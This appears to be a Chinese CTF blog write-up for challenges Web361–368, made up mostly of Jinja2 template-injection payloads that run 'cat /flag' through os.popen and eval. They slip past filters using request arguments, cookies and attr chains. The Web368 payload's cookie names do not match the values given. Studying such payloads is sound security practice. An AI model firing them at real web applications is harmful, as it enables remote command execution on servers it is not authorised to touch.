Web361

payload

?name={{[].__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
//注意:__subclasses()[下标],这里需要自己找到os._wrap_close

Web362

payload

?name={{s.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
//注意:注意单引号之类的

Web363

payload

?name={{s.__init__.__globals__[request.args.p1].eval(request.args.p2)}}&p1=__builtins__&p2=__import__('os').popen('cat /flag').read()
//字符串逃逸,把参数交给p1和p2来传参

Web364

payload

?name={{s.__init__.__globals__[request.cookies.p1].eval(request.cookies.p2)}}
cookie传值:p1: __builtins__ p2: __import__('os').popen('cat /flag').read()
//逃逸,把过滤的参数交给cookie传参

Web365

payload

?name={{s.__init__.__globals__.__getitem__(request.cookies.k1).eval(request.cookies.k2)}}
cookie传入: k1: __getitem__   k2:__import__('os').popen('cat /flag').read()
//知识点: __globals__['builtins']与__glolbals__.__getitem__('builtins')相同

Web366-367

payload

{{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
cookie传入: x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()

Web368

payload

?name={%print((x|attr(request.cookies.k1)|attr(request.cookies.k2)|attr(request.cookies.k3))(request.cookies.k4).eval(request.cookies.k5))%}

cookie传入x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()

或者
name={% print(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read() %}&a=__globals__&b=os&c=cat /flag
//request.value.xxx 可以接受post或者get传值
最后修改:2022 年 07 月 17 日
如果觉得我的文章对你有用,请随意赞赏